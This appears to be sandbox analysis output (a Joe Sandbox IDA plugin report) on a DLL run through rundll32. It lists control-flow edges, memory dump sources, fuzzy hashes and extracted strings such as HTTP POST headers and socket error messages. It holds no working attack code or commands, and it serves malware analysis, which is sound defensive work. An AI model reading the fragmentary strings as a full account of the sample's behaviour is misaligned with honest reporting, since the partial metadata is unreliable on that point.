2205->2228 2207->2214 2215 7ffd92c3181b-7ffd92c3182a call 7ffd92c26f90 2207->2215 2217 7ffd92c319b3-7ffd92c319ba 2210->2217 2218 7ffd92c31997-7ffd92c319ae call 7ffd92c15950 2210->2218 2222 7ffd92c31b71-7ffd92c31b7e 2214->2222 2215->2178 2226 7ffd92c319c0-7ffd92c319e8 call 7ffd92c15ff0 call 7ffd92c15900 2217->2226 2227 7ffd92c31a3e-7ffd92c31a53 call 7ffd92c15950 2217->2227 2238 7ffd92c31a57-7ffd92c31a59 2218->2238 2220->2178 2222->2151 2224->2100 2226->2100 2246 7ffd92c319ee-7ffd92c319fe 2226->2246 2227->2238 2228->2204 2230->2222 2231->2178 2238->2100 2243 7ffd92c31a5f-7ffd92c31a6b call 7ffd92c35e70 2238->2243 2243->2204 2248 7ffd92c31a00-7ffd92c31a07 2246->2248 2248->2248 2249 7ffd92c31a09-7ffd92c31a1d call 7ffd92c15950 2248->2249 2252 7ffd92c31a1f-7ffd92c31a2d call 7ffd92c15950 2249->2252 2253 7ffd92c31a32-7ffd92c31a38 2249->2253 2252->2253 2253->2100 2253->2227
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.5554047154.00007FFD92BE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFD92BE0000, based on PE: true
                                • Associated: 00000010.00000002.5554028318.00007FFD92BE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000010.00000002.5554128263.00007FFD92CEA000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000010.00000002.5554162005.00007FFD92D2A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000010.00000002.5554180701.00007FFD92D2F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_7ffd92be0000_rundll32.jbxd
                                Similarity
                                • API ID:
                                • String ID: %s$%x$0$100-continue$Content-Length$Content-Length: %I64d$Content-Length: 0$Content-Type$Content-Type: application/x-www-form-urlencoded$Expect$Expect:$Failed sending HTTP POST request$Failed sending HTTP request$Failed sending POST request$Failed sending PUT request
                                • API String ID: 0-502057143
                                • Opcode ID: b29578a7b57bf9ddbc1fed7d59809027ef25a9640a71b33a7d89bd820d7e58e9
                                • Instruction ID: b8e2d07e5009e748180ce6288f986340eb1ec5286186697cbc68fa5037f8d294
                                • Opcode Fuzzy Hash: b29578a7b57bf9ddbc1fed7d59809027ef25a9640a71b33a7d89bd820d7e58e9
                                • Instruction Fuzzy Hash: 28128C61B0868288FB34DBA694612FD2390EF05BD6F484A35DE5D47799EFECE651C300
                                APIs
                                • Concurrency::details::_Scheduler::_Scheduler.LIBCMTD ref: 00007FFD92C93198
                                • __crt_scoped_stack_ptr.LIBCPMTD ref: 00007FFD92C931A2
                                  • Part of subcall function 00007FFD92C92E20: Concurrency::details::_Scheduler::_Scheduler.LIBCMTD ref: 00007FFD92C92E38
                                  • Part of subcall function 00007FFD92CBF5F0: Concurrency::details::_Scheduler::_Scheduler.LIBCMTD ref: 00007FFD92CBF645
                                  • Part of subcall function 00007FFD92CBAC00: Concurrency::details::_Scheduler::_Scheduler.LIBCMTD ref: 00007FFD92CBAC13
                                  • Part of subcall function 00007FFD92CBAC00: __crt_scoped_stack_ptr.LIBCPMTD ref: 00007FFD92CBAC1D
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.5554047154.00007FFD92BE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFD92BE0000, based on PE: true
                                • Associated: 00000010.00000002.5554028318.00007FFD92BE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000010.00000002.5554128263.00007FFD92CEA000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000010.00000002.5554162005.00007FFD92D2A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000010.00000002.5554180701.00007FFD92D2F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_7ffd92be0000_rundll32.jbxd
                                Similarity
                                • API ID: Concurrency::details::_SchedulerScheduler::_$__crt_scoped_stack_ptr
                                • String ID: %ls$_fclose_nolock_internal$minkernel\crts\ucrt\src\appcrt\stdio\fclose.cpp$stream.valid()
                                • API String ID: 4164245112-3166852756
                                • Opcode ID: a5ffaeaf6bac3cdd2b3cb803ac1a63f7dd1f6ac5655aa2d8d1d23ef1b7c4d498
                                • Instruction ID: 89ddad49e90383c09f3c888f1cf9efda7d81bba8cd233b3f531ecebc97636cfe
                                • Opcode Fuzzy Hash: a5ffaeaf6bac3cdd2b3cb803ac1a63f7dd1f6ac5655aa2d8d1d23ef1b7c4d498
                                • Instruction Fuzzy Hash: F9414F32B5DA4281FA20EB90E4A53AE7760FBC1352F501131E68E476EADFBCD945CB40
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.5554047154.00007FFD92BE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFD92BE0000, based on PE: true
                                • Associated: 00000010.00000002.5554028318.00007FFD92BE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000010.00000002.5554128263.00007FFD92CEA000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000010.00000002.5554162005.00007FFD92D2A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000010.00000002.5554180701.00007FFD92D2F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_7ffd92be0000_rundll32.jbxd
                                Similarity
                                • API ID: Ioctlsetsockopt
                                • String ID: $Failed to alloc scratch buffer$We are completely uploaded and fine
                                • API String ID: 1903391676-2090592439
                                • Opcode ID: 6c1c5674d205714105010a9475caa237fcac7e64cbfa933fee0e310006a5d6f1
                                • Instruction ID: 134ec7a315fffff4664de430d1a812098964157782355c0807933089a2c71ed7
                                • Opcode Fuzzy Hash: 6c1c5674d205714105010a9475caa237fcac7e64cbfa933fee0e310006a5d6f1
                                • Instruction Fuzzy Hash: 01E16962B09BC181FB619FA5D4603FD23A0EB55F99F084235DE4C0B799EFB8E4858310
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.5554047154.00007FFD92BE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFD92BE0000, based on PE: true
                                • Associated: 00000010.00000002.5554028318.00007FFD92BE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000010.00000002.5554128263.00007FFD92CEA000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000010.00000002.5554162005.00007FFD92D2A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000010.00000002.5554180701.00007FFD92D2F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_7ffd92be0000_rundll32.jbxd
                                Similarity
                                • API ID: ErrorLast$connect
                                • String ID: connect to %s port %u failed: %s
                                • API String ID: 375857812-2835513649
                                • Opcode ID: 35426790cd646d2abe0b259636e90f30822dde65868a0c6a453a7baa595e5a7a
                                • Instruction ID: ea9d0a6ddb0ddf5eb06a2df9a216365855056ded686bbf836fad3e6777292b42
                                • Opcode Fuzzy Hash: 35426790cd646d2abe0b259636e90f30822dde65868a0c6a453a7baa595e5a7a
                                • Instruction Fuzzy Hash: 3051B322B0C68685FB719FE5D424BBD2750AB41BB5F084231DE2D4B2D6DFA8E485C350
                                APIs
                                Memory Dump Source
                                • Source File: 00000010.00000002.5554047154.00007FFD92BE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFD92BE0000, based on PE: true
                                • Associated: 00000010.00000002.5554028318.00007FFD92BE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000010.00000002.5554128263.00007FFD92CEA000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000010.00000002.5554162005.00007FFD92D2A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000010.00000002.5554180701.00007FFD92D2F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_7ffd92be0000_rundll32.jbxd
                                Similarity
                                • API ID: ErrorLastSleepgetsockopt
                                • String ID:
                                • API String ID: 3033474312-0
                                • Opcode ID: cbb260f30f3792f59bba316126a7d3cab7eb90b7cebd467d3e13b86401f8dfd0
                                • Instruction ID: c7a451554aa29494712db1e8e65edd785070c7e88fb3c5539d2841f92d7265a9
                                • Opcode Fuzzy Hash: cbb260f30f3792f59bba316126a7d3cab7eb90b7cebd467d3e13b86401f8dfd0
                                • Instruction Fuzzy Hash: 4D011A3170C64286FB748B91E86463EBBA4AB457D5F254034EA8A46A94DFBDE4458B00
                                APIs
                                Memory Dump Source
                                • Source File: 00000010.00000002.5554047154.00007FFD92BE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFD92BE0000, based on PE: true
                                • Associated: 00000010.00000002.5554028318.00007FFD92BE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000010.00000002.5554128263.00007FFD92CEA000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000010.00000002.5554162005.00007FFD92D2A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000010.00000002.5554180701.00007FFD92D2F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_7ffd92be0000_rundll32.jbxd
                                Similarity
                                • API ID: __vcrt_lock
                                • String ID:
                                • API String ID: 3805268497-0
                                • Opcode ID: 41d24cbb1d0383c0d661ef98a3b7f47cf29ba88232a38dedc747ce806050d45d
                                • Instruction ID: 8c32d383a3f7fc302af974e6ca9bc6c3926ecfaa297abac9d09aba34ab92f585
                                • Opcode Fuzzy Hash: 41d24cbb1d0383c0d661ef98a3b7f47cf29ba88232a38dedc747ce806050d45d
                                • Instruction Fuzzy Hash: C5F0FF21F4CA8681FA30BB91E46227E6364FFC5356F440531EA8E877E6DF6CE605C611
                                APIs
                                Memory Dump Source
                                • Source File: 00000010.00000002.5554047154.00007FFD92BE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFD92BE0000, based on PE: true
                                • Associated: 00000010.00000002.5554028318.00007FFD92BE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000010.00000002.5554128263.00007FFD92CEA000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000010.00000002.5554162005.00007FFD92D2A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000010.00000002.5554180701.00007FFD92D2F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_7ffd92be0000_rundll32.jbxd
                                Similarity
                                • API ID: closesocket
                                • String ID:
                                • API String ID: 2781271927-0
                                • Opcode ID: 187b7bc2a9f825df5aa9e2809a290329328927cc865f69aa9828c897424ecf30
                                • Instruction ID: 6cff09b5af3b48fcc2016b20b584afafb96031806b177f6e08046f485f799fbf
                                • Opcode Fuzzy Hash: 187b7bc2a9f825df5aa9e2809a290329328927cc865f69aa9828c897424ecf30
                                • Instruction Fuzzy Hash: 33218B63B18B8192E7688BB9E5947AD6760E759BB9F250321DBBC033D5CF64D4E0C340
                                APIs
                                  • Part of subcall function 00007FFD92CC8840: __CxxFrameHandler2.LIBCMTD ref: 00007FFD92CC8863
                                • Concurrency::details::_Scheduler::_Scheduler.LIBCMTD ref: 00007FFD92CC9253
                                  • Part of subcall function 00007FFD92CC8A00: _invoke_watson_if_error.LIBCMTD ref: 00007FFD92CC8A6E
                                  • Part of subcall function 00007FFD92CC8A00: _invoke_watson_if_error.LIBCMTD ref: 00007FFD92CC8AA5
                                  • Part of subcall function 00007FFD92C0AC50: __crt_unique_heap_ptr.LIBCMTD ref: 00007FFD92C0AC5E
                                Memory Dump Source
                                • Source File: 00000010.00000002.5554047154.00007FFD92BE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFD92BE0000, based on PE: true
                                • Associated: 00000010.00000002.5554028318.00007FFD92BE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000010.00000002.5554128263.00007FFD92CEA000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000010.00000002.5554162005.00007FFD92D2A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000010.00000002.5554180701.00007FFD92D2F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_7ffd92be0000_rundll32.jbxd
                                Similarity
                                • API ID: _invoke_watson_if_error$Concurrency::details::_FrameHandler2SchedulerScheduler::___crt_unique_heap_ptr
                                • String ID:
                                • API String ID: 3486799128-0
                                • Opcode ID: 38d90f99987e32a5f59509817b778bacc91015699e05273823e207923321f910
                                • Instruction ID: 585549dd7f7746e079ecefdaf1fd2bbda2c7b17d08a66ff0bbfc24b7b7c275d0
                                • Opcode Fuzzy Hash: 38d90f99987e32a5f59509817b778bacc91015699e05273823e207923321f910
                                • Instruction Fuzzy Hash: 72113021B1CA4282FB70EB95E46537E73B0FBC4745F401632E68D466A9DFBCE5058B40
                                APIs
                                • Concurrency::details::_Scheduler::_Scheduler.LIBCMTD ref: 00007FFD92CC5423
                                  • Part of subcall function 00007FFD92CC49E0: __crt_scoped_stack_ptr.LIBCPMTD ref: 00007FFD92CC49F4
                                Memory Dump Source
                                • Source File: 00000010.00000002.5554047154.00007FFD92BE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFD92BE0000, based on PE: true
                                • Associated: 00000010.00000002.5554028318.00007FFD92BE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000010.00000002.5554128263.00007FFD92CEA000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000010.00000002.5554162005.00007FFD92D2A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000010.00000002.5554180701.00007FFD92D2F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_7ffd92be0000_rundll32.jbxd
                                Similarity
                                • API ID: Concurrency::details::_SchedulerScheduler::___crt_scoped_stack_ptr
                                • String ID:
                                • API String ID: 614740146-0
                                • Opcode ID: 7e7a60a190c4d829d78ea71c487d317489d324ebd5495139aceeb50bac227877
                                • Instruction ID: ca02f153cb4570c96bb1a27c9978eb7c3542facef40238b312137f5986e1d94d
                                • Opcode Fuzzy Hash: 7e7a60a190c4d829d78ea71c487d317489d324ebd5495139aceeb50bac227877
                                • Instruction Fuzzy Hash: 77C01267F1848291DD20FB50E46205E6330F7D0785FD08031EB8C03666CD6CC519CB00